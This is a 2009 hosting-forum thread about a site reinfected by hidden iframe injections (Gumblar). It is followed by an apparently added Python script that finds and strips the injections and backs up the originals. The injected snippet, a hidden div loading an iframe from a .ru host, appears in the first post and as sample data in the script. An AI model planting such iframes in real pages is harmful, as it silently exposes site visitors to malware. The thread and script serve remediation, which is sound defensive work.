Thread: Iframe Virus .ru .cn
09-19-2009, 03:57 PM #1 | WHT Addict | Join Date: Aug 2006 | Location: USA/UK | Posts: 112
Iframe Virus .ru .cn
Hey
We are having some issues with one of our web sites. The web site is quite big, over 24 GB, and to get in you need to log in via a login script. The site is a lead management site.
Over the last 3 days we have noticed that the login page loads with an iframe. After looking at the code I noticed there are tons of these iframe viruses in the code, like:
Code:
<div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
How can I stop these viruses coming back each time I clean the pages? I have tried to chmod to 444 as someone suggested, but I am unable to change the files to anything other than 644.
Please help, this is driving me crazy.
Thanks
Martyn
“In the midst of chaos, there is also opportunity”
― Sun Tzu, The Art of War
09-19-2009, 04:04 PM #2 | Rebooting is a hack, not a fix | Join Date: May 2008 | Location: Citrus Heights, CA | Posts: 1,887
http://forums.tizag.com/showthread.php?t=15474
I believe this was discussed here a few times as well.
iWebFusion.Net - Shared / Reseller / VPS / Bare Metal / Colocation / IP Transit / Networking
*Simply Hosting - Wholly owned networks, in-house staff, legions of fans!
09-19-2009, 05:22 PM #3 | Problem Solver | Join Date: Mar 2003 | Location: California USA | Posts: 13,681
This can be happening for a variety of reasons.
1.) FTP access
The account's FTP password could have been obtained or brute-forced. This would allow the attacker to log in and modify the account directly.
2.) Rogue PHP Script Exploit
One of the scripts on that account, or even on another account, could have an exploit which would allow the attacker to inject malicious code to do various things on the server.
3.) PHP Shell
There could be a PHP shell on the server somewhere from a previous attack. A PHP shell such as c99 can potentially give the attacker full access to the server via kernel exploits.
It sounds like you need to have the entire server looked at and secured.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
09-19-2009, 05:52 PM #4 | Aspiring Evangelist | Join Date: Sep 2007 | Posts: 369
Better secure your server: install mod_security, change all passwords as well, and take a backup (with the date) on the server when you clean a site. Also set up a good antivirus to do an hourly scan so you come to know which files have a problem. Regularly check your server's logwatch, check /var/log/messages, /var/log/secure and the Apache logs, and set up a proper firewall implementation: turn on iptables for outgoing ports, and for incoming ports open only those you require. It varies from environment to environment. I know it's hard initially to implement all this, but once you have implemented it you are much more relaxed, and can then have a glass of apple juice.
09-19-2009, 06:11 PM #5 | WHT Addict | Join Date: Aug 2006 | Location: USA/UK | Posts: 112
Thanks for the replies guys, really appreciate it.
I'm not really experienced with Linux, so a server set up with the correct firewalls and security has been overlooked or they are outdated, and I honestly don't trust myself to do it.
Would anyone here be able to point me in the direction of a good server admin that can do a one-time set up, and help me eradicate this?
Spent 8 hours today cleaning 4000 files of this code, and we didn't even build this script!
Thanks again
Martyn
09-19-2009, 06:14 PM #6 | Web Hosting Master | Join Date: Apr 2007 | Location: United Kingdom | Posts: 1,861
Steven from www.rack911.com should be able to do that for you.
09-19-2009, 06:15 PM #7 | WHT Addict | Join Date: Jun 2009 | Posts: 112
The virus attacks mostly these files:
index.php
main.php
footer.php
index.html
so make sure you clean these files properly, or else the virus issue will be there again, and change the FTP password. Set a very strong password (include digits, symbols, etc.).
You can also hire someone to do that: make a thread in the request section!
09-19-2009, 06:18 PM #8 | WHT Addict | Join Date: Aug 2006 | Location: USA/UK | Posts: 112
Hey
Yes, that is what we did. After looking over 4000 files, the code was in many files, not just the index or main files but in sub-directories of sub-directories. Of the 4000 there were 120 or so infected.
I cleaned each, changed the passwords for FTP and SQL, re-uploaded, and then after around 30 minutes it was back in each file I had just cleaned! So I ended up almost crying! The good part is that I have the cleaned files on my local PC, so I can upload these at will, but I want to secure the server first and find out where this is coming from, as simply re-uploading the files is not really working for me.
Last edited by M-Vizovi; 09-19-2009 at 06:21 PM.
09-19-2009, 06:24 PM #9 | WHT Addict | Join Date: Jun 2009 | Posts: 112
That sucks really. Very irritating . Hire a professional as soon as possible to do this work!
09-19-2009, 08:16 PM #10 | Web Hosting Master | Join Date: Apr 2003 | Location: NC | Posts: 3,093
In the future you may want to script a find and replace, that way you can clean up ALL files with a single command. You would still need to clean them up, but that at least helps clean it up quicker.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
09-19-2009, 08:30 PM #11 | WHT Addict | Join Date: Aug 2006 | Location: USA/UK | Posts: 112
Hey
We seem to have found the issue: it is the Gumblar virus that is hidden in a client's PDF file. As soon as this file is read it activates the infection.
A scripting idea would be awesome, but the URL of the virus changes each time it's activated, e.g. gxmbler.ru, bxxoxe-life.ru, etc. I guess we could search for "iframe".
Thanks
Martyn
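Post #10 suggests scripting the find and replace, and post #11 points out why matching on the domain will not work: the host changes on every re-infection. The script below is an added example, not code from either poster, that matches the shape of the injection quoted in post #1 (a `display:none` div wrapping an iframe) regardless of host, port, path or iframe size, removes every instance from each file, and copies each original to a dated backup directory first, as post #4 recommends. The file extensions, the temporary demo tree and the sample file contents are assumptions constructed for the demo.

```python
"""Bulk removal of injected hidden iframes with a pre-clean backup.
Added example for the thread above; sample files and paths are constructed assumptions."""
import os
import re
import shutil
import tempfile
import time

# The injection from post #1, generalised: the host, port, path and iframe dimensions
# are deliberately not part of the match because they change on every re-infection.
INJECTION = re.compile(
    rb'<div\s+style="display:\s*none;?"\s*>\s*'
    rb'<iframe\s+src="(https?://[^"]+)"[^>]*>\s*</iframe>\s*</div>\s*',
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample content (not real infected files from the thread).
INJECTED_FOOTER = (
    b'<div style="display:none"><iframe src="http://gxmbler.ru:8080/index.php" '
    b'width=666 height=295 ></iframe></div>\n'
    b'<?php echo "footer"; ?>\n'
    b'<div style="display:none"><iframe src="http://bxxoxe-life.ru:8080/index.php" '
    b'width=1 height=1></iframe></div>\n'
)
INJECTED_INDEX = (
    b'<html><body>\n'
    b'<div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" '
    b'width=666 height=295 ></iframe></div>\n'
    b'</body></html>\n'
)
# A legitimate hidden div with no iframe must survive the cleaner untouched.
CLEAN_PAGE = b'<?php include "main.php"; ?>\n<div style="display:none">legit hidden block</div>\n'


def find_injections(data):
    """Return the iframe src URLs of every injection in `data` (bytes), for reporting."""
    return [m.group(1).decode('ascii', 'replace') for m in INJECTION.finditer(data)]


def clean_bytes(data):
    """Return (cleaned_data, number_of_injections_removed)."""
    return INJECTION.subn(b'', data)


def read_bytes(path):
    with open(path, 'rb') as fh:
        return fh.read()


def clean_tree(root, backup_root, exts=('.php', '.html', '.htm', '.js', '.tpl')):
    """Clean every matching file under `root` in place, copying the original to
    `backup_root` first. Returns {path: {'removed', 'urls', 'backup'}} for changed files."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            data = read_bytes(path)
            cleaned, count = clean_bytes(data)
            if count == 0:
                continue
            backup_path = os.path.join(backup_root, os.path.relpath(path, root))
            os.makedirs(os.path.dirname(backup_path), exist_ok=True)
            shutil.copy2(path, backup_path)      # keeps the original bytes and mtime for forensics
            with open(path, 'wb') as fh:
                fh.write(cleaned)
            report[path] = {'removed': count, 'urls': find_injections(data), 'backup': backup_path}
    return report


def build_sample_tree():
    """Throwaway site tree with the constructed files above. Returns (root, backup_root, paths)."""
    base = tempfile.mkdtemp(prefix='iframe-clean-demo-')
    root = os.path.join(base, 'public_html')
    os.makedirs(os.path.join(root, 'inc', 'deep'))
    paths = {
        'footer': os.path.join(root, 'inc', 'deep', 'footer.php'),
        'index': os.path.join(root, 'index.html'),
        'clean': os.path.join(root, 'main.php'),
    }
    for key, data in (('footer', INJECTED_FOOTER), ('index', INJECTED_INDEX), ('clean', CLEAN_PAGE)):
        with open(paths[key], 'wb') as fh:
            fh.write(data)
    backup_root = os.path.join(base, 'backup-' + time.strftime('%Y%m%d-%H%M%S'))
    return root, backup_root, paths


if __name__ == '__main__':
    root, backup_root, _ = build_sample_tree()
    for path, info in clean_tree(root, backup_root).items():
        print(f"{path}: removed {info['removed']} from {info['urls']}; original at {info['backup']}")
```

The `urls` list in the report is worth keeping: it is the set of hosts to block at the firewall and to look for in the access logs. Cleaning alone does not end the incident, as post #8 found; the injection comes back within minutes while the attacker still has the FTP password or the shell, and chmod 444 does not help when the attacker writes as the file owner, because the owner can chmod the file back. Close the entry point first, then run the cleaner once.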